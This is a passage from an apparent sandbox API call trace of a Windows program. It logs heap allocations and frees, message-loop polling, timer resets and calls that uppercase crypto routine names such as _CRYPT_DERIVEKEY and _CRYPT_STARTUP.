0x2e77b48 [0247.276] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0247.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0247.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0247.276] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0247.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0247.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0247.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0247.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d98 [0247.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0247.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0247.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0247.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0247.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0247.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0247.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e512f8 [0247.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0247.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0247.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0247.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0247.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0247.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0247.276] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0247.277] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0247.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0247.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0247.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0247.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0247.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0247.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0247.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0247.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0247.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0247.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0247.277] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0247.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0247.277] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0247.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0247.410] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 1 [0247.410] TranslateMessage (lpMsg=0x8cf4a8) returned 0 [0247.410] DispatchMessageW (lpMsg=0x8cf4a8) returned 0x0 [0247.410] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0247.411] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0247.411] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0247.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55e30 [0247.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0247.411] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0247.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55e30 | out: hHeap=0x970000) returned 1 [0247.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0247.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51490 [0247.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0247.411] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0247.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0247.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0247.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0247.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0247.411] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0247.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0247.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0247.412] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0247.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0247.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0247.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0247.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0247.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0247.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0247.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0247.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0247.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54648 | out: hHeap=0x970000) returned 1 [0247.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0247.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545f8 | out: hHeap=0x970000) returned 1 [0247.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0247.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0247.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0247.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0247.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0247.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0247.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0247.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0247.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563c8 | out: hHeap=0x970000) returned 1 [0247.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0247.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0247.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0247.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545d0 | out: hHeap=0x970000) returned 1 [0247.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0247.412] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0247.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0247.412] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0247.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0247.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0247.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0247.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0247.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0247.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0247.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0247.413] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0247.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0247.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0247.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0247.413] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0247.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0247.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0247.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0247.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54eb8 [0247.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0247.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0247.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0247.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0247.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0247.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e98 [0247.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0247.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0247.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0247.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e513d0 [0247.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545d0 [0247.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0247.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0247.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0247.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545f8 [0247.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0247.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0247.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54648 [0247.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0247.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0247.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0247.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0247.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514c0 [0247.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0247.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51460 [0247.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0247.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0247.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0247.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0247.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0247.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0247.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0247.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0247.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0247.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0247.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0247.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0247.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0247.414] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0247.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0247.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0247.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0247.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0247.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0247.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0247.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0247.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0247.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0247.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0247.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0247.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0247.415] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0247.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0247.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0247.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0247.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0247.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0247.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0247.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0247.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0247.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0247.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0247.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0247.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0247.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0247.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0247.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0247.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0247.416] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0247.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0247.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0247.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0247.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0247.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0247.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0247.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0247.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0247.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0247.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0247.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0247.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0247.416] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0247.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0247.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0247.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0247.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0247.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0247.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0247.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0247.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0247.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0247.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0247.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0247.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0247.417] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0247.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0247.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0247.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0247.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0247.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0247.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0247.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0247.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0247.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0247.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0247.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0247.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0247.417] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0247.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0247.417] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0247.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0247.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0247.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51538 [0247.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0247.418] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0247.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0247.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55c70 [0247.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0247.418] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0247.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c70 | out: hHeap=0x970000) returned 1 [0247.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0247.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51310 [0247.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0247.418] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0247.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0247.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0247.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0247.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0247.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0247.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: 